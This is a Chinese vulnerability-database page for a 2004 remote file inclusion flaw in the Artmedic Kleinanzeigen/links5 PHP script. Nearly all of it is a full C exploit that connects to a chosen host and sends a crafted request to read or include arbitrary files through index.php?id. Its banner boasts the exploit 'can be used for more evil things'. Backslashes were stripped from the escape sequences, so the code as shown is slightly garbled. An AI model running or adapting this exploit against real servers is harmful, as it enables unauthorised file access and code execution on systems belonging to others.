Artmedic Webdesign Kleinanzeigen Script – Remote File Inclusion
漏洞ID | 1054531 | 漏洞类型 | |
发布时间 | 2004-07-19 | 更新时间 | 2004-07-19 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | PHP | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/10746/info
Kleinanzeigen is prone to a file include vulnerability. This issue could allow a remote attacker to include malicious files containing arbitrary code to be executed on a vulnerable computer.
If successful, the malicious script supplied by the attacker will be executed in the context of the web server hosting the vulnerable software.
*/
/*
* artmedic_links5 remote file access exploit
* Adam Simuntis <[email protected]>
*/
#include <stdio.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <getopt.h>
extern int h_errno;
#define PHP_FILE "index.php?id"
#define BANNER "nartmedic_links5 remote file access (can be used for more evil things)nAdam Simuntis <[email protected]>n"
int usage(char *p_name){
printf("nn%s { options } "
"nt-s Hostname / IP Address"
"nt-c Path to file"
"nt-p Server port"
"nt-P artmedic links5 path ,ex.:"
"ntt/artmedic_links5/"
"nt-h This help..nn",p_name);
exit(-1);
}
char *header(char *path, char *php_file, char *cmd, char *host){
char buf[8192];
sprintf(buf,
"GET %s%s=%s HTTP/1.1rn"
"Host: %srn"
"User-Agent: Mozilla/5.0 (X11; U; Linux i666; en-US; rv:1.7.5) "
"Gecko/20050304 Firefox/1.0rn"
"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,"
"text/plain;q=0.8,image/png,*/*;q=0.5rn"
"Accept-Language: en-us,en;q=0.5rn"
"Accept-Encoding: gzip,deflatern"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn"
"Keep-Alive: 300rn"
"Connection: keep-alivern"
"rnn",path,php_file,cmd,host);
return buf;
}
int main(int argc, char **argv){
int opt, gniazdko, port;
struct hostent *hp;
struct sockaddr_in s;
char *target, *command, *wej, *header_p, *path, *addr;
if(argc<2) usage(argv[0]);
if(argc>1){
while(( opt = getopt(argc,argv,"s:p:P:c:?")) != -1 ){
switch(opt){
case 's':
target = optarg;
break;
case 'c':
command = optarg;
break;
case 'p':
port = atoi(optarg);
break;
case 'P':
path = optarg;
break;
case 'h':
case '?':
default:
usage(argv[0]);
break;
}
}
memset(&s,0,sizeof(s));
hp = gethostbyname(target);
addr = inet_ntoa( *(struct in_addr *)hp->h_addr_list[0] );
puts(BANNER);
s.sin_port = htons(port);
s.sin_family = AF_INET;
s.sin_addr.s_addr = inet_addr(addr);
if( (gniazdko = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0 ) printf("n{-} Cannot create socket!n");
if (connect(gniazdko, (struct sockaddr*)&s, 16) < 0){
printf("nConnection failed!n");
exit(-1);
}
header_p = header(path,PHP_FILE,command,target);
printf("n{+} Sending request and returning server answer, please wait a while..n");
sleep(2);
send(gniazdko, header_p, strlen(header_p), 0);
while(read(gniazdko, &wej, 1))
putchar(wej);
close(gniazdko);
return 0;
}
}
相关推荐: Novell BorderManager Remote DoS Vulnerability
Novell BorderManager Remote DoS Vulnerability 漏洞ID 1103253 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 2001-04-20 更新时间 2001…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666